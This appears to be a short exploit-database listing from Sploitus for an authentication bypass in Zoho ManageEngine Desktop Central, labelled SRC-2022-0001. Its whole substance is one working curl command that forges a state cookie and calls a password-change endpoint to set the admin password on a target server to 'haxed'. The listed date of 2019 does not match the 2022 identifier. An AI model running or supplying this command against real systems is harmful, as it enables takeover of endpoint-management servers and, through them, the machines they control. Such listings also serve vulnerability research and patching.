Sploitus

Exploit for SRC-2022-0001 : Zoho ManageEngine Desktop Central StateFilter Arbitrary Forward Authentication Bypass Vulnerability

srcincite · 2019-12-12

Exploit Code

MARKDOWN2 lines
## https://sploitus.com/exploit?id=SRC-2022-0001
curl -kb "STATE_COOKIE=&_REQS/_TIME/1337" "https://target.tld:8383/STATE_ID/1337/changeDefaultAmazonPassword?loginName=admin&newUserPassword=haxed" -d ""